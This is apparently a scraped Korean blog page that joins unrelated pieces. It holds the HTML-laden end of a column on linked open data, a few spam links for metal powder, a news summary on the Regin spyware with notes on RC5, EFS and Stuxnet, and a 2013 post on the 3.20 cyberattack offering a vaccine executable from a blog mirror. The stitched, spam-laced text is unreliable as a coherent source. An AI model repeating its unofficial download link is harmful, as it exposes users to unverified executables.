flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><h4 style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 500; font-stretch: inherit; font-size: 1.5rem; line-height: 1.1; font-family: inherit; vertical-align: top; margin: 10px 0px 0.5rem; padding: 0px; text-size-adjust: none; color: inherit;"><br style="box-sizing: inherit;"><br style="box-sizing: inherit;">방향성<br style="box-sizing: inherit;"></h4><br style="box-sizing: inherit;">공공데이터에 대한 여러가지 기술에 대한 노력은 이미 미국, 영국, 한국 정부 등에서 진행되고 있으며, 한국정보화진흥원이 2014년에 발간한 '2014 링크드 오픈 데이터 국내 구축 사례집'에 따르면 '새로운 어플리케이션 혹은 서비스, 비즈니스 모델 창출을 위해서는 기초 데이터의 가공과 정제 등에 많은 노력을 기울여야 한다"라고 설명하고 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">또한, "단순히 개방된 형태의 데이터보다는 링크드 데이터로 개방된 데이터의 가치 창출이 기업, 개인, 정부 등이 상호 지속적인 연결고리를 가지며 고 부가가치 창출이 가능하다"라고 말하고 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">한국 공공기관이 이러한 데이터 구축 사업 사례로 발표한 사례는 2014년 기준으로 10여건에 불과하며, 많은 움직임들이 현재 국/내외에서 발생하고 있습니다. 이러한 데이터를 활용한 여러가지 고 부가가치 서비스를 위해서는 우선 데이터 양 자체가 많아야 하며, 이를 연결할 수 있는 메타 데이터 요소도 많아야 합니다.&nbsp;<br style="box-sizing: inherit;"></div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-md-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_3-1.jpg" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 883.5px;"><br style="box-sizing: inherit;"></div></div><div class="row justify-content-center" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap; justify-content: center !important;"><div class="col col-md-auto" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: auto; min-height: 1px; flex: 0 0 auto; max-width: none;">[그림3 국립중앙도서관 LOD 서비스]</div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;">새로운 기술이나 문화가 탄생한 배경에는 반드시 이유가 존재합니다. 이러한 데이터 기술들이 주목받게 된 배경과 데이터 기술을 활용한 무한한 가능성이 존재하지만 어디까지나 이러한 기술들은 모두 훌륭한 도구이자 방법임을 잊지 말아야 합니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">많은 노력과 비용이 드는 과정이 포함되고 당장 눈에 보이는 가시적인 효과는 드러나지 않을 수 있으나 한번 잘 만들어진 데이터는 트렌드와 상관없이 유용하게 활용될 것이며, 연결이라는 특징은 여러 데이터가 융합되어 지금은 생각지도 못한 새로운 가치를 창출할 것으로 기대할 수 있습니다.</div></div></div></div></div>metal powder - http://www.hanaamt.com
    magnesium powder - http://www.hanaamt.com
    3d printing powder - http://www.hanaamt.com
    am powder - http://www.hanaamt.com

 

 

<기사 요약>

 

  보안 업체인 시만텍은 지난 23일, 적어도 2008년부터 러시아, 사우디아라비아 등 10개 이상의 국가에 침입하여 정부 기관, 인터넷 사업자, 이동통신사 등을 대상으로 정보를 수집한 은닉형 악성코드 '레진(Regin)'을 발견했다고 한다.

 

  이 악성코드는 분석을 어렵게 하기 위해 안티 포렌식 기능과 함께 잘 사용되지 않는 RC5 암호, 암호화된 가상 파일 시스템(EVFS)를 사용하고 있다.

 

  현재 침투 경로나 방법은 밝혀지지 않았으나, 침투 후 마이크로소프트 이메일 서버와 주요 이통사의 휴대전화를 해킹하는 것으로 밝혀졌다.

 

  아주 정교한 코드를 사용하고 있어 발견이 어려웠으며, 지난 2010년 이란 핵시설을 타깃으로 하던 '스턱스넷(Stuxnet)'보다 뛰어난 기술을 사용하고 있어, 미국의 정보기관이 운영하고 있는게 아니냐는 의심을 받고 있다.

 

  뿐만 아니라 이 은닉 기능을 갖춘 악성코드 레진은 키보드, 마우스, 모니터 등의 입/출력 장치를 캡쳐하며, 비밀번호, 데이터와 함께 전송하며, 감염된 대상의 트래픽, 이메일을 분석하는 기능도 갖췄다고 알려지고 있다.

 

 

 

은닉기능 갖춘 최첨단 스파이웨어 ‘레긴’ 포착(보안뉴스) - http://www.boannews.com/media/view.asp?idx=44279

시만텍, 스텔스 기능 갖춘 정교한 악성코드 포착(전자신문) - http://www.etnews.com/20141125000189

 

-------------------------------

 

<RC5 암호 - http://en.wikipedia.org/wiki/RC5>

RC5 암호란 1994년도에 발표된 암호로 키의 길이는 0~2040 bit를 가지며, 블록의 크기는 32, 64, 128 bit를 사용한다.

Feistel 구조를 가지며 1~255까지의 라운드 연산을 한다.

초기에는 128bit의 키, 64bit의 블록 크기, 12라운드 연산을 제안했다.

12라운드(64bit 블록)에서는 차분공격의 방법으로 2^44의 평문이 필요하며, 18~20라운드에서는 충분한 안전성을 가지게 된다.

 

 

 

<Encrypted Volume and File System(EVFS) - http://ko.wikipedia.org/wiki/파일_시스템_암호화>

EVFS로 검색하면 HP의 문서밖에 없는 것으로 봐서, 볼륨 시스템 암호화와 파일 시스템을 암호화를 합쳐서 부르는 것으로 보여진다.

 

EFS는 파일 시스템 암호화이며 윈도 NTFS 버전 3.0에서 추가된 기능이다. 기본적으로는 비 암호화 상태이지만 사용자의 선택으로 쉽게 파일, 폴더, 드라이브 단위로 암호화 할 수 있다. 하지만 다른 것들과 호환되는 걸 싫어하는 MS의 배짱으로 인해 다른 시스템과는 호환되지 않는다.

NTFS만 지원한다는 문제 점이 있지만 공개 키 / 대칭 키 방식을 조합하여 암호화 하기 때문에 복호화가 매우 어렵지만 사실상 사용자 계정 비밀번호로 EFS 암호화 키를 보호하기 때문에 대부분의 공격에 취약하며, 반대로 이 말은 사용자 계정 비밀번호가 안전할 수록 강력해 질 수 있다.

 

※ 생각보다 한국 위키에도 설명이 자세히(많이) 되어 있어서 자세한 설명은 생략..

 

 

 

<스턱스넷(Stuxnet) - http://ko.wikipedia.org/wiki/스턱스넷>

2010년 6월 발견된 웜형의 바이러스이며 지멘스(Siemens)사의 소프트웨어 및 장비를 공격한다.

산업시설을 감시하고 파괴하는 최초의 악성코드이며, 윈도가 설치된 컴퓨터라면 모두 감염되지만 지멘스 사의 SCADA 시스템만을 대상으로 동작한다.

최종 목표는 이란의 우라늄 농축 시설인 것으로 추정되며, 감염된 컴퓨터 중 60%가 이란에 소재하고 있다고 한다.

굉장히 치밀하고 정교한 공격을 사용하기에, 이 공격은 국가 단위로 진행됐다고 볼 수 밖에 없으며 이스라엘과 미국이 참여한 것으로 추정하고 있다.

 







 

이번 3.20 사이버테러는 악성코드로 인한 것임이 밝혀졌습니다.

KISA에서는 2차적 피해를 막기 위해 개인 사용자들에게도 해당 악성코드를 탐지, 치료가 가능한 전용 백신을 보급 중입니다.

보호나라에서 보급 중이며 CMOS에서 PC시간을 2013년 3월 20일 14시 이전으로 변경 후 전용 백신으로 치료하라고 알려주고 있습니다.

 

아래 링크 또는 블로그에서 바로 다운로드가 가능합니다. = )

 

 

 

 

전용 백신 치료 방법 : http://www.boho.or.kr/kor/notice/noticeView.jsp?p_bulletin_writing_sequence=2033

전용 백신 다운로드 : http://download.boho.or.kr/vacc_care/vacc_board_view_frame.jsp?vac_id=VAC20130320001

 

▼ 블로그에서 바로 다운로드 

KISA_HAURI_S152_20130320_4.EXE

 






+ Recent posts

티스토리 툴바